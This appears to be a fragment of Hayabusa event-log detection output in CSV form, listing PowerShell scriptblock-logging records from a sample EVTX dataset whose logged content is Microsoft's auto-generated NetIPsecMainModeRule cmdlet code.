[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"oup}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSe",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"oup}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { 